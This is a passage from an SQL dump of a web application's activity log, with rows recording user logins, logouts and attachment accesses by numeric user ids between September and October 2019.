15:17:56',NULL),(20812,2,'Attachment',419,'2019-09-19 15:17:56','2019-09-19 15:17:56',NULL),(20813,2,'Attachment',288,'2019-09-19 15:17:56','2019-09-19 15:17:56',NULL),(20814,2,'Attachment',181,'2019-09-19 15:17:56','2019-09-19 15:17:56',NULL),(20815,50,'Login',50,'2019-09-19 15:31:06','2019-09-19 15:31:06',NULL),(20816,2,'Attachment',539,'2019-09-19 15:48:45','2019-09-19 15:48:45',NULL),(20817,2,'Attachment',541,'2019-09-19 15:48:45','2019-09-19 15:48:45',NULL),(20818,2,'Attachment',538,'2019-09-19 15:48:45','2019-09-19 15:48:45',NULL),(20819,2,'Attachment',535,'2019-09-19 15:48:45','2019-09-19 15:48:45',NULL),(20820,2,'Attachment',403,'2019-09-19 15:48:45','2019-09-19 15:48:45',NULL),(20821,2,'Attachment',180,'2019-09-19 15:48:47','2019-09-19 15:48:47',NULL),(20822,2,'Attachment',69,'2019-09-19 15:48:47','2019-09-19 15:48:47',NULL),(20823,2,'Attachment',14,'2019-09-19 15:48:47','2019-09-19 15:48:47',NULL),(20824,2,'Attachment',36,'2019-09-19 15:48:47','2019-09-19 15:48:47',NULL),(20825,2,'Attachment',371,'2019-09-19 15:48:47','2019-09-19 15:48:47',NULL),(20826,2,'Attachment',354,'2019-09-19 15:48:47','2019-09-19 15:48:47',NULL),(20827,50,'Login',50,'2019-09-19 16:08:51','2019-09-19 16:08:51',NULL),(20828,49,'Login',49,'2019-09-19 16:24:11','2019-09-19 16:24:11',NULL),(20829,52,'Login',52,'2019-09-19 18:33:19','2019-09-19 18:33:19',NULL),(20830,2,'Attachment',524,'2019-09-20 00:10:56','2019-09-20 00:10:56',NULL),(20831,2,'Attachment',29,'2019-09-20 03:19:04','2019-09-20 03:19:04',NULL),(20832,52,'Login',52,'2019-09-20 08:39:41','2019-09-20 08:39:41',NULL),(20833,52,'Logout',52,'2019-09-20 09:01:39','2019-09-20 09:01:39',NULL),(20834,52,'Login',52,'2019-09-20 09:03:19','2019-09-20 09:03:19',NULL),(20835,52,'Logout',52,'2019-09-20 09:21:58','2019-09-20 09:21:58',NULL),(20836,8,'Login',8,'2019-09-20 09:22:06','2019-09-20 09:22:06',NULL),(20837,52,'Login',52,'2019-09-20 09:24:12','2019-09-20 09:24:12',NULL),(20838,52,'Attachment',29,'2019-09-20 09:28:09','2019-09-20 09:28:09',NULL),(20839,52,'Attachment',757,'2019-09-20 09:28:09','2019-09-20 09:28:09',NULL),(20840,52,'Attachment',181,'2019-09-20 09:28:09','2019-09-20 09:28:09',NULL),(20841,52,'Attachment',24,'2019-09-20 09:28:09','2019-09-20 09:28:09',NULL),(20842,52,'Attachment',288,'2019-09-20 09:28:09','2019-09-20 09:28:09',NULL),(20843,52,'Attachment',419,'2019-09-20 09:28:09','2019-09-20 09:28:09',NULL),(20844,52,'Attachment',546,'2019-09-20 09:28:11','2019-09-20 09:28:11',NULL),(20845,52,'Attachment',535,'2019-09-20 09:28:11','2019-09-20 09:28:11',NULL),(20846,52,'Attachment',753,'2019-09-20 09:28:11','2019-09-20 09:28:11',NULL),(20847,52,'Attachment',538,'2019-09-20 09:28:12','2019-09-20 09:28:12',NULL),(20848,52,'Attachment',755,'2019-09-20 09:28:12','2019-09-20 09:28:12',NULL),(20849,52,'Attachment',539,'2019-09-20 09:28:12','2019-09-20 09:28:12',NULL),(20850,52,'Attachment',541,'2019-09-20 09:28:19','2019-09-20 09:28:19',NULL),(20851,52,'Attachment',416,'2019-09-20 09:28:20','2019-09-20 09:28:20',NULL),(20852,52,'Attachment',403,'2019-09-20 09:28:20','2019-09-20 09:28:20',NULL),(20853,52,'Attachment',354,'2019-09-20 09:28:20','2019-09-20 09:28:20',NULL),(20854,52,'Attachment',180,'2019-09-20 09:28:20','2019-09-20 09:28:20',NULL),(20855,52,'Attachment',69,'2019-09-20 09:28:20','2019-09-20 09:28:20',NULL),(20856,52,'Attachment',371,'2019-09-20 09:28:20','2019-09-20 09:28:20',NULL),(20857,8,'Logout',8,'2019-09-20 09:32:57','2019-09-20 09:32:57',NULL),(20858,52,'Login',52,'2019-09-20 09:33:02','2019-09-20 09:33:02',NULL),(20859,52,'Attachment',14,'2019-09-20 10:28:41','2019-09-20 10:28:41',NULL),(20860,52,'Attachment',36,'2019-09-20 10:28:41','2019-09-20 10:28:41',NULL),(20861,52,'Attachment',523,'2019-09-20 10:49:40','2019-09-20 10:49:40',NULL),(20862,2,'Attachment',757,'2019-09-20 15:04:41','2019-09-20 15:04:41',NULL),(20863,2,'Attachment',29,'2019-09-20 15:04:41','2019-09-20 15:04:41',NULL),(20864,2,'Attachment',24,'2019-09-20 15:04:41','2019-09-20 15:04:41',NULL),(20865,2,'Attachment',419,'2019-09-20 15:04:41','2019-09-20 15:04:41',NULL),(20866,2,'Attachment',288,'2019-09-20 15:04:41','2019-09-20 15:04:41',NULL),(20867,2,'Attachment',181,'2019-09-20 15:04:41','2019-09-20 15:04:41',NULL),(20868,16,'Login',16,'2019-09-20 15:04:46','2019-09-20 15:04:46',NULL),(20869,2,'Attachment',757,'2019-09-20 20:43:40','2019-09-20 20:43:40',NULL),(20870,2,'Attachment',29,'2019-09-20 20:43:40','2019-09-20 20:43:40',NULL),(20871,2,'Attachment',288,'2019-09-20 20:43:40','2019-09-20 20:43:40',NULL),(20872,2,'Attachment',24,'2019-09-20 20:43:40','2019-09-20 20:43:40',NULL),(20873,2,'Attachment',181,'2019-09-20 20:43:41','2019-09-20 20:43:41',NULL),(20874,2,'Attachment',419,'2019-09-20 20:43:41','2019-09-20 20:43:41',NULL),(20875,29,'Login',29,'2019-09-20 20:43:59','2019-09-20 20:43:59',NULL),(20876,52,'Login',52,'2019-09-21 08:44:35','2019-09-21 08:44:35',NULL),(20877,55,'Login',55,'2019-09-21 09:59:52','2019-09-21 09:59:52',NULL),(20878,16,'Login',16,'2019-09-21 17:31:14','2019-09-21 17:31:14',NULL),(20879,16,'Logout',16,'2019-09-21 17:31:30','2019-09-21 17:31:30',NULL),(20880,2,'Attachment',757,'2019-09-21 17:31:31','2019-09-21 17:31:31',NULL),(20881,2,'Attachment',29,'2019-09-21 17:31:31','2019-09-21 17:31:31',NULL),(20882,2,'Attachment',24,'2019-09-21 17:31:31','2019-09-21 17:31:31',NULL),(20883,2,'Attachment',419,'2019-09-21 17:31:31','2019-09-21 17:31:31',NULL),(20884,2,'Attachment',288,'2019-09-21 17:31:31','2019-09-21 17:31:31',NULL),(20885,2,'Attachment',181,'2019-09-21 17:31:31','2019-09-21 17:31:31',NULL),(20886,2,'Attachment',757,'2019-09-23 16:33:22','2019-09-23 16:33:22',NULL),(20887,2,'Attachment',29,'2019-09-23 16:33:34','2019-09-23 16:33:34',NULL),(20888,2,'Attachment',24,'2019-09-23 16:33:41','2019-09-23 16:33:41',NULL),(20889,2,'Attachment',419,'2019-09-23 16:33:44','2019-09-23 16:33:44',NULL),(20890,2,'Attachment',181,'2019-09-23 16:33:47','2019-09-23 16:33:47',NULL),(20891,2,'Attachment',288,'2019-09-23 16:33:48','2019-09-23 16:33:48',NULL),(20892,2,'Attachment',539,'2019-09-23 16:47:56','2019-09-23 16:47:56',NULL),(20893,2,'Attachment',541,'2019-09-23 16:47:56','2019-09-23 16:47:56',NULL),(20894,2,'Attachment',538,'2019-09-23 16:47:59','2019-09-23 16:47:59',NULL),(20895,2,'Attachment',535,'2019-09-23 16:47:59','2019-09-23 16:47:59',NULL),(20896,2,'Attachment',757,'2019-09-23 16:48:22','2019-09-23 16:48:22',NULL),(20897,2,'Attachment',29,'2019-09-23 16:48:22','2019-09-23 16:48:22',NULL),(20898,2,'Attachment',24,'2019-09-23 16:48:30','2019-09-23 16:48:30',NULL),(20899,26,'Login',26,'2019-09-23 16:48:50','2019-09-23 16:48:50',NULL),(20900,26,'Login',26,'2019-09-23 16:49:10','2019-09-23 16:49:10',NULL),(20901,2,'Attachment',757,'2019-09-24 09:36:54','2019-09-24 09:36:54',NULL),(20902,2,'Attachment',29,'2019-09-24 09:36:54','2019-09-24 09:36:54',NULL),(20903,2,'Attachment',24,'2019-09-24 09:36:54','2019-09-24 09:36:54',NULL),(20904,2,'Attachment',288,'2019-09-24 09:36:54','2019-09-24 09:36:54',NULL),(20905,2,'Attachment',419,'2019-09-24 09:36:54','2019-09-24 09:36:54',NULL),(20906,2,'Attachment',181,'2019-09-24 09:36:54','2019-09-24 09:36:54',NULL),(20907,2,'Attachment',757,'2019-09-24 10:01:27','2019-09-24 10:01:27',NULL),(20908,2,'Attachment',181,'2019-09-24 10:01:27','2019-09-24 10:01:27',NULL),(20909,2,'Attachment',288,'2019-09-24 10:01:27','2019-09-24 10:01:27',NULL),(20910,2,'Attachment',29,'2019-09-24 10:01:27','2019-09-24 10:01:27',NULL),(20911,2,'Attachment',24,'2019-09-24 10:01:27','2019-09-24 10:01:27',NULL),(20912,2,'Attachment',419,'2019-09-24 10:01:27','2019-09-24 10:01:27',NULL),(20913,16,'Login',16,'2019-09-24 10:02:13','2019-09-24 10:02:13',NULL),(20914,2,'Attachment',757,'2019-09-24 10:02:49','2019-09-24 10:02:49',NULL),(20915,2,'Attachment',29,'2019-09-24 10:02:49','2019-09-24 10:02:49',NULL),(20916,2,'Attachment',24,'2019-09-24 10:02:49','2019-09-24 10:02:49',NULL),(20917,2,'Attachment',419,'2019-09-24 10:02:50','2019-09-24 10:02:50',NULL),(20918,2,'Attachment',181,'2019-09-24 10:02:50','2019-09-24 10:02:50',NULL),(20919,2,'Attachment',288,'2019-09-24 10:02:50','2019-09-24 10:02:50',NULL),(20920,16,'Logout',16,'2019-09-24 10:02:55','2019-09-24 10:02:55',NULL),(20921,2,'Attachment',757,'2019-09-24 10:03:55','2019-09-24 10:03:55',NULL),(20922,2,'Attachment',29,'2019-09-24 10:03:55','2019-09-24 10:03:55',NULL),(20923,2,'Attachment',24,'2019-09-24 10:03:55','2019-09-24 10:03:55',NULL),(20924,2,'Attachment',419,'2019-09-24 10:03:56','2019-09-24 10:03:56',NULL),(20925,2,'Attachment',288,'2019-09-24 10:03:56','2019-09-24 10:03:56',NULL),(20926,2,'Attachment',181,'2019-09-24 10:03:56','2019-09-24 10:03:56',NULL),(20927,50,'Login',50,'2019-09-24 10:04:05','2019-09-24 10:04:05',NULL),(20928,50,'Login',50,'2019-09-24 10:05:07','2019-09-24 10:05:07',NULL),(20929,2,'Attachment',29,'2019-09-24 10:08:18','2019-09-24 10:08:18',NULL),(20930,2,'Attachment',757,'2019-09-24 10:08:18','2019-09-24 10:08:18',NULL),(20931,2,'Attachment',24,'2019-09-24 10:08:18','2019-09-24 10:08:18',NULL),(20932,2,'Attachment',419,'2019-09-24 10:08:18','2019-09-24 10:08:18',NULL),(20933,2,'Attachment',288,'2019-09-24 10:08:18','2019-09-24 10:08:18',NULL),(20934,2,'Attachment',181,'2019-09-24 10:08:18','2019-09-24 10:08:18',NULL),(20935,50,'Login',50,'2019-09-24 10:24:05','2019-09-24 10:24:05',NULL),(20936,2,'Attachment',757,'2019-09-25 09:29:11','2019-09-25 09:29:11',NULL),(20937,2,'Attachment',29,'2019-09-25 09:29:11','2019-09-25 09:29:11',NULL),(20938,2,'Attachment',24,'2019-09-25 09:29:11','2019-09-25 09:29:11',NULL),(20939,2,'Attachment',419,'2019-09-25 09:29:11','2019-09-25 09:29:11',NULL),(20940,2,'Attachment',288,'2019-09-25 09:29:11','2019-09-25 09:29:11',NULL),(20941,2,'Attachment',181,'2019-09-25 09:29:11','2019-09-25 09:29:11',NULL),(20942,2,'Attachment',757,'2019-09-25 13:50:02','2019-09-25 13:50:02',NULL),(20943,2,'Attachment',29,'2019-09-25 13:50:03','2019-09-25 13:50:03',NULL),(20944,2,'Attachment',24,'2019-09-25 13:50:03','2019-09-25 13:50:03',NULL),(20945,2,'Attachment',419,'2019-09-25 13:50:03','2019-09-25 13:50:03',NULL),(20946,2,'Attachment',181,'2019-09-25 13:50:03','2019-09-25 13:50:03',NULL),(20947,2,'Attachment',288,'2019-09-25 13:50:03','2019-09-25 13:50:03',NULL),(20948,2,'Attachment',757,'2019-09-27 09:10:18','2019-09-27 09:10:18',NULL),(20949,2,'Attachment',419,'2019-09-27 09:10:19','2019-09-27 09:10:19',NULL),(20950,2,'Attachment',24,'2019-09-27 09:10:19','2019-09-27 09:10:19',NULL),(20951,2,'Attachment',288,'2019-09-27 09:10:19','2019-09-27 09:10:19',NULL),(20952,2,'Attachment',181,'2019-09-27 09:10:19','2019-09-27 09:10:19',NULL),(20953,2,'Attachment',29,'2019-09-27 09:10:19','2019-09-27 09:10:19',NULL),(20954,50,'Login',50,'2019-09-27 09:10:27','2019-09-27 09:10:27',NULL),(20955,2,'Attachment',757,'2019-09-27 15:23:21','2019-09-27 15:23:21',NULL),(20956,2,'Attachment',29,'2019-09-27 15:23:21','2019-09-27 15:23:21',NULL),(20957,2,'Attachment',24,'2019-09-27 15:23:21','2019-09-27 15:23:21',NULL),(20958,2,'Attachment',288,'2019-09-27 15:23:21','2019-09-27 15:23:21',NULL),(20959,2,'Attachment',419,'2019-09-27 15:23:21','2019-09-27 15:23:21',NULL),(20960,2,'Attachment',181,'2019-09-27 15:23:21','2019-09-27 15:23:21',NULL),(20961,2,'Attachment',757,'2019-09-28 09:22:51','2019-09-28 09:22:51',NULL),(20962,2,'Attachment',29,'2019-09-28 09:22:51','2019-09-28 09:22:51',NULL),(20963,2,'Attachment',24,'2019-09-28 09:22:52','2019-09-28 09:22:52',NULL),(20964,2,'Attachment',419,'2019-09-28 09:22:52','2019-09-28 09:22:52',NULL),(20965,2,'Attachment',181,'2019-09-28 09:22:52','2019-09-28 09:22:52',NULL),(20966,2,'Attachment',288,'2019-09-28 09:22:52','2019-09-28 09:22:52',NULL),(20967,2,'Attachment',757,'2019-09-28 16:32:35','2019-09-28 16:32:35',NULL),(20968,2,'Attachment',29,'2019-09-28 16:32:35','2019-09-28 16:32:35',NULL),(20969,2,'Attachment',24,'2019-09-28 16:32:35','2019-09-28 16:32:35',NULL),(20970,2,'Attachment',419,'2019-09-28 16:32:35','2019-09-28 16:32:35',NULL),(20971,2,'Attachment',288,'2019-09-28 16:32:35','2019-09-28 16:32:35',NULL),(20972,2,'Attachment',181,'2019-09-28 16:32:35','2019-09-28 16:32:35',NULL),(20973,50,'Login',50,'2019-09-28 16:32:46','2019-09-28 16:32:46',NULL),(20974,50,'Login',50,'2019-09-29 09:08:27','2019-09-29 09:08:27',NULL),(20975,50,'Login',50,'2019-09-30 11:12:57','2019-09-30 11:12:57',NULL),(20976,50,'Attachment',515,'2019-09-30 12:19:27','2019-09-30 12:19:27',NULL),(20977,2,'Attachment',757,'2019-10-07 21:52:10','2019-10-07 21:52:10',NULL),(20978,2,'Attachment',29,'2019-10-07 21:52:10','2019-10-07 21:52:10',NULL),(20979,2,'Attachment',24,'2019-10-07 21:52:10','2019-10-07 21:52:10',NULL),(20980,2,'Attachment',419,'2019-10-07 21:52:10','2019-10-07 21:52:10',NULL),(20981,2,'Attachment',288,'2019-10-07 21:52:10','2019-10-07 21:52:10',NULL),(20982,2,'Attachment',181,'2019-10-07 21:52:10','2019-10-07 21:52:10',NULL),(20983,2,'Attachment',538,'2019-10-07 21:52:14','2019-10-07 21:52:14',NULL),(20984,2,'Attachment',539,'2019-10-07 21:52:14','2019-10-07 21:52:14',NULL),(20985,2,'Attachment',403,'2019-10-07 21:52:14','2019-10-07 21:52:14',NULL),(20986,2,'Attachment',416,'2019-10-07 21:52:14','2019-10-07 21:52:14',NULL),(20987,2,'Attachment',541,'2019-10-07 21:52:15','2019-10-07 21:52:15',NULL),(20988,2,'Attachment',535,'2019-10-07 21:52:15','2019-10-07 21:52:15',NULL),(20989,2,'Attachment',757,'2019-10-07 23:09:15','2019-10-07 23:09:15',NULL),(20990,2,'Attachment',419,'2019-10-07 23:09:16','2019-10-07 23:09:16',NULL),(20991,2,'Attachment',29,'2019-10-07 23:09:16','2019-10-07 23:09:16',NULL),(20992,2,'Attachment',24,'2019-10-07 23:09:16','2019-10-07 23:09:16',NULL),(20993,2,'Attachment',181,'2019-10-07 23:09:16','2019-10-07 23:09:16',NULL),(20994,2,'Attachment',288,'2019-10-07 23:09:16','2019-10-07 23:09:16',NULL),(20995,2,'Attachment',757,'2019-10-08 08:40:20','2019-10-08 08:40:20',NULL),(20996,2,'Attachment',29,'2019-10-08 08:40:20','2019-10-08 08:40:20',NULL),(20997,2,'Attachment',24,'2019-10-08 08:40:20','2019-10-08 08:40:20',NULL),(20998,2,'Attachment',419,'2019-10-08 08:40:21','2019-10-08 08:40:21',NULL),(20999,2,'Attachment',288,'2019-10-08 08:40:21','2019-10-08 08:40:21',NULL),(21000,2,'Attachment',181,'2019-10-08 08:40:21','2019-10-08 08:40:21',NULL),(21001,46,'Login',46,'2019-10-08 08:50:45','2019-10-08 08:50:45',NULL),(21002,46,'Logout',46,'2019-10-08 08:54:32','2019-10-08 08:54:32',NULL),(21003,2,'Attachment',757,'2019-10-08 08:54:32','2019-10-08 08:54:32',NULL),(21004,2,'Attachment',24,'2019-10-08 08:54:32','2019-10-08 08:54:32',NULL),(21005,2,'Attachment',29,'2019-10-08 08:54:32','2019-10-08 08:54:32',NULL),(21006,2,'Attachment',419,'2019-10-08 08:54:32','2019-10-08 08:54:32',NULL),(21007,2,'Attachment',288,'2019-10-08 08:54:32','2019-10-08 08:54:32',NULL),(21008,2,'Attachment',181,'2019-10-08 08:54:33','2019-10-08 08:54:33',NULL),(21009,49,'Login',49,'2019-10-08 08:54:54','2019-10-08 08:54:54',NULL),(21010,49,'Attachment',514,'2019-10-08 08:55:47','2019-10-08 08:55:47',NULL),(21011,49,'Logout',49,'2019-10-08 09:01:06','2019-10-08 09:01:06',NULL),(21012,2,'Attachment',757,'2019-10-08 09:01:06','2019-10-08 09:01:06',NULL),(21013,49,'Login',49,'2019-10-08 09:02:57','2019-10-08 09:02:57',NULL),(21014,2,'Attachment',371,'2019-10-08 09:11:15','2019-10-08 09:11:15',NULL),(21015,2,'Attachment',14,'2019-10-08 09:11:15','2019-10-08 09:11:15',NULL),(21016,2,'Attachment',180,'2019-10-08 09:11:15','2019-10-08 09:11:15',NULL),(21017,2,'Attachment',69,'2019-10-08 09:11:15','2019-10-08 09:11:15',NULL),(21018,2,'Attachment',354,'2019-10-08 09:11:15','2019-10-08 09:11:15',NULL),(21019,2,'Attachment',36,'2019-10-08 09:11:15','2019-10-08 09:11:15',NULL),(21020,2,'Attachment',29,'2019-10-08 10:34:31','2019-10-08 10:34:31',NULL),(21021,2,'Attachment',181,'2019-10-08 10:34:32','2019-10-08 10:34:32',NULL),(21022,20,'Login',20,'2019-10-08 10:34:43','2019-10-08 10:34:43',NULL),(21023,20,'Attachment',535,'2019-10-08 10:35:27','2019-10-08 10:35:27',NULL),(21024,20,'Attachment',546,'2019-10-08 10:35:27','2019-10-08 10:35:27',NULL),(21025,20,'Attachment',753,'2019-10-08 10:35:27','2019-10-08 10:35:27',NULL),(21026,20,'Attachment',538,'2019-10-08 10:35:28','2019-10-08 10:35:28',NULL),(21027,20,'Attachment',539,'2019-10-08 10:35:29','2019-10-08 10:35:29',NULL),(21028,20,'Attachment',755,'2019-10-08 10:35:29','2019-10-08 10:35:29',NULL),(21029,20,'Attachment',541,'2019-10-08 10:35:29','2019-10-08 10:35:29',NULL),(21030,20,'Attachment',416,'2019-10-08 10:35:30','2019-10-08 10:35:30',NULL),(21031,20,'Attachment',403,'2019-10-08 10:35:30','2019-10-08 10:35:30',NULL),(21032,20,'Attachment',371,'2019-10-08 10:35:30','2019-10-08 10:35:30',NULL),(21033,20,'Attachment',354,'2019-10-08 10:35:30','2019-10-08 10:35:30',NULL),(21034,20,'Attachment',180,'2019-10-08 10:35:30','2019-10-08 10:35:30',NULL),(21035,20,'Attachment',69,'2019-10-08 10:35:30','2019-10-08 10:35:30',NULL),(21036,50,'Login',50,'2019-10-08 10:37:44','2019-10-08 10:37:44',NULL),(21037,50,'Attachment',757,'2019-10-08 10:38:36','2019-10-08 10:38:36',NULL),(21038,50,'Attachment',29,'2019-10-08 10:38:36','2019-10-08 10:38:36',NULL),(21039,50,'Attachment',419,'2019-10-08 10:38:36','2019-10-08 10:38:36',NULL),(21040,50,'Attachment',416,'2019-10-08 10:38:36','2019-10-08 10:38:36',NULL),(21041,50,'Attachment',24,'2019-10-08 10:38:36','2019-10-08 10:38:36',NULL),(21042,50,'Attachment',288,'2019-10-08 10:38:36','2019-10-08 10:38:36',NULL),(21043,50,'Attachment',181,'2019-10-08 10:38:36','2019-10-08 10:38:36',NULL),(21044,49,'Login',49,'2019-10-08 10:39:55','2019-10-08 10:39:55',NULL),(21045,49,'Attachment',547,'2019-10-08 10:41:15','2019-10-08 10:41:15',NULL),(21046,49,'Attachment',548,'2019-10-08 10:41:15','2019-10-08 10:41:15',NULL),(21047,49,'Attachment',549,'2019-10-08 10:41:15','2019-10-08 10:41:15',NULL),(21048,49,'Attachment',551,'2019-10-08 10:41:15','2019-10-08 10:41:15',NULL),(21049,49,'Attachment',552,'2019-10-08 10:41:15','2019-10-08 10:41:15',NULL),(21050,49,'Attachment',550,'2019-10-08 10:41:15','2019-10-08 10:41:15',NULL),(21051,49,'Attachment',553,'2019-10-08 10:41:15','2019-10-08 10:41:15',NULL),(21052,49,'Attachment',554,'2019-10-08 10:41:15','2019-10-08 10:41:15',NULL),(21053,49,'Attachment',555,'2019-10-08 10:41:15','2019-10-08 10:41:15',NULL),(21054,49,'Attachment',559,'2019-10-08 10:41:15','2019-10-08 10:41:15',NULL),(21055,49,'Attachment',556,'2019-10-08 10:41:15','2019-10-08 10:41:15',NULL),(21056,49,'Attachment',557,'2019-10-08 10:41:15','2019-10-08 10:41:15',NULL),(21057,52,'Login',52,'2019-10-08 11:05:15','2019-10-08 11:05:15',NULL),(21058,49,'Logout',49,'2019-10-08 14:05:20','2019-10-08 14:05:20',NULL),(21059,2,'Attachment',757,'2019-10-08 14:05:20','2019-10-08 14:05:20',NULL),(21060,2,'Attachment',24,'2019-10-08 14:05:20','2019-10-08 14:05:20',NULL),(21061,2,'Attachment',29,'2019-10-08 14:05:20','2019-10-08 14:05:20',NULL),(21062,2,'Attachment',416,'2019-10-08 14:05:20','2019-10-08 14:05:20',NULL),(21063,2,'Attachment',419,'2019-10-08 14:05:20','2019-10-08 14:05:20',NULL),(21064,2,'Attachment',288,'2019-10-08 14:05:20','2019-10-08 14:05:20',NULL),(21065,2,'Attachment',181,'2019-10-08 14:05:20','2019-10-08 14:05:20',NULL),(21066,49,'Login',49,'2019-10-08 14:05:34','2019-10-08 14:05:34',NULL),(21067,2,'Attachment',757,'2019-10-08 16:02:33','2019-10-08 16:02:33',NULL),(21068,2,'Attachment',29,'2019-10-08 16:02:34','2019-10-08 16:02:34',NULL),(21069,2,'Attachment',416,'2019-10-08 16:02:34','2019-10-08 16:02:34',NULL),(21070,2,'Attachment',24,'2019-10-08 16:02:34','2019-10-08 16:02:34',NULL),(21071,2,'Attachment',419,'2019-10-08 16:02:34','2019-10-08 16:02:34',NULL),(21072,2,'Attachment',288,'2019-10-08 16:02:34','2019-10-08 16:02:34',NULL),(21073,2,'Attachment',181,'2019-10-08 16:02:34','2019-10-08 16:02:34',NULL),(21074,2,'Attachment',416,'2019-10-08 17:04:57','2019-10-08 17:04:57',NULL),(21075,29,'Login',29,'2019-10-09 08:57:53','2019-10-09 08:57:53',NULL),(21076,29,'Attachment',757,'2019-10-09 08:58:11','2019-10-09 08:58:11',NULL),(21077,29,'Attachment',24,'2019-10-09 08:58:11','2019-10-09 08:58:11',NULL),(21078,29,'Attachment',416,'2019-10-09 08:58:11','2019-10-09 08:58:11',NULL),(21079,29,'Attachment',419,'2019-10-09 08:58:11','2019-10-09 08:58:11',NULL),(21080,29,'Attachment',29,'2019-10-09 08:58:11','2019-10-09 08:58:11',NULL),(21081,29,'Attachment',288,'2019-10-09 08:58:11','2019-10-09 08:58:11',NULL),(21082,29,'Attachment',181,'2019-10-09 08:58:11','2019-10-09 08:58:11',NULL),(21083,49,'Login',49,'2019-10-09 08:59:38','2019-10-09 08:59:38',NULL),(21084,50,'Login',50,'2019-10-09 09:00:18','2019-10-09 09:00:18',NULL),(21085,46,'Login',46,'2019-10-09 09:53:29','2019-10-09 09:53:29',NULL),(21086,46,'Logout',46,'2019-10-09 10:07:58','2019-10-09 10:07:58',NULL),(21087,49,'Login',49,'2019-10-09 10:08:19','2019-10-09 10:08:19',NULL),(21088,2,'Attachment',416,'2019-10-09 14:04:58','2019-10-09 14:04:58',NULL),(21089,50,'Login',50,'2019-10-09 14:05:07','2019-10-09 14:05:07',NULL),(21090,2,'Attachment',757,'2019-10-10 15:18:37','2019-10-10 15:18:37',NULL),(21091,2,'Attachment',29,'2019-10-10 15:18:37','2019-10-10 15:18:37',NULL),(21092,2,'Attachment',416,'2019-10-10 15:18:38','2019-10-10 15:18:38',NULL),(21093,2,'Attachment',419,'2019-10-10 15:18:38','2019-10-10 15:18:38',NULL),(21094,2,'Attachment',288,'2019-10-10 15:18:38','2019-10-10 15:18:38',NULL),(21095,2,'Attachment',24,'2019-10-10 15:18:38','2019-10-10 15:18:38',NULL),(21096,2,'Attachment',181,'2019-10-10 15:18:38','2019-10-10 15:18:38',NULL),(21097,2,'Attachment',538,'2019-10-10 15:19:19','2019-10-10 15:19:19',NULL),(21098,57,'Attachment',29,'2019-10-10 16:49:24','2019-10-10 16:49:24',NULL),(21099,57,'Attachment',757,'2019-10-10 16:49:24','2019-10-10 16:49:24',NULL),(21100,57,'Attachment',24,'2019-10-10 16:49:24','2019-10-10 16:49:24',NULL),(21101,57,'Attachment',416,'2019-10-10 16:49:24','2019-10-10 16:49:24',NULL),(21102,57,'Attachment',419,'2019-10-10 16:49:24','2019-10-10 16:49:24',NULL),(21103,57,'Attachment',288,'2019-10-10 16:49:24','2019-10-10 16:49:24',NULL),(21104,57,'Attachment',181,'2019-10-10 16:49:24','2019-10-10 16:49:24',NULL),(21105,2,'Attachment',288,'2019-10-10 17:25:19','2019-10-10 17:25:19',NULL),(21106,2,'Attachment',29,'2019-10-10 17:25:19','2019-10-10 17:25:19',NULL),(21107,2,'Attachment',416,'2019-10-10 17:25:20','2019-10-10 17:25:20',NULL),(21108,2,'Attachment',757,'2019-10-10 17:25:20','2019-10-10 17:25:20',NULL),(21109,2,'Attachment',181,'2019-10-10 17:25:20','2019-10-10 17:25:20',NULL),(21110,2,'Attachment',24,'2019-10-10 17:25:20','2019-10-10 17:25:20',NULL),(21111,2,'Attachment',419,'2019-10-10 17:25:20','2019-10-10 17:25:20',NULL),(21112,2,'Attachment',757,'2019-10-10 17:28:23','2019-10-10 17:28:23',NULL),(21113,2,'Attachment',29,'2019-10-10 17:28:24','2019-10-10 17:28:24',NULL),(21114,2,'Attachment',24,'2019-10-10 17:28:24','2019-10-10 17:28:24',NULL),(21115,2,'Attachment',416,'2019-10-10 17:28:24','2019-10-10 17:28:24',NULL),(21116,2,'Attachment',419,'2019-10-10 17:28:24','2019-10-10 17:28:24',NULL),(21117,2,'Attachment',288,'2019-10-10 17:28:24','2019-10-10 17:28:24',NULL),(21118,2,'Attachment',181,'2019-10-10 17:28:24','2019-10-10 17:28:24',NULL),(21119,2,'Attachment',755,'2019-10-10 17:28:45','2019-10-10 17:28:45',NULL),(21120,2,'Attachment',539,'2019-10-10 17:28:45','2019-10-10 17:28:45',NULL),(21121,49,'Login',49,'2019-10-11 09:04:19','2019-10-11 09:04:19',NULL),(21122,2,'Attachment',29,'2019-10-11 09:05:45','2019-10-11 09:05:45',NULL),(21123,2,'Attachment',419,'2019-10-11 09:05:45','2019-10-11 09:05:45',NULL),(21124,2,'Attachment',181,'2019-10-11 09:05:45','2019-10-11 09:05:45',NULL),(21125,50,'Login',50,'2019-10-11 09:06:36','2019-10-11 09:06:36',NULL),(21126,2,'Attachment',757,'2019-10-11 11:15:39','2019-10-11 11:15:39',NULL),(21127,2,'Attachment',419,'2019-10-11 11:15:39','2019-10-11 11:15:39',NULL),(21128,2,'Attachment',29,'2019-10-11 11:15:40','2019-10-11 11:15:40',NULL),(21129,2,'Attachment',181,'2019-10-11 11:15:40','2019-10-11 11:15:40',NULL),(21130,2,'Attachment',416,'2019-10-11 11:15:40','2019-10-11 11:15:40',NULL),(21131,2,'Attachment',24,'2019-10-11 11:15:40','2019-10-11 11:15:40',NULL),(21132,49,'Logout',49,'2019-10-11 15:00:14','2019-10-11 15:00:14',NULL),(21133,20,'Login',20,'2019-10-11 15:00:21','2019-10-11 15:00:21',NULL),(21134,52,'Login',52,'2019-10-11 15:07:02','2019-10-11 15:07:02',NULL),(21135,20,'Logout',20,'2019-10-11 15:27:27','2019-10-11 15:27:27',NULL),(21136,49,'Login',49,'2019-10-11 15:27:32','2019-10-11 15:27:32',NULL),(21137,49,'Logout',49,'2019-10-11 15:27:46','2019-10-11 15:27:46',NULL),(21138,50,'Login',50,'2019-10-11 15:27:51','2019-10-11 15:27:51',NULL),(21139,2,'Attachment',757,'2019-10-11 16:32:56','2019-10-11 16:32:56',NULL),(21140,2,'Attachment',24,'2019-10-11 16:32:56','2019-10-11 16:32:56',NULL),(21141,2,'Attachment',419,'2019-10-11 16:32:56','2019-10-11 16:32:56',NULL),(21142,2,'Attachment',29,'2019-10-11 16:32:56','2019-10-11 16:32:56',NULL),(21143,2,'Attachment',416,'2019-10-11 16:32:56','2019-10-11 16:32:56',NULL),(21144,2,'Attachment',181,'2019-10-11 16:32:56','2019-10-11 16:32:56',NULL),(21145,2,'Attachment',288,'2019-10-11 16:32:56','2019-10-11 16:32:56',NULL),(21146,29,'Login',29,'2019-10-11 16:33:23','2019-10-11 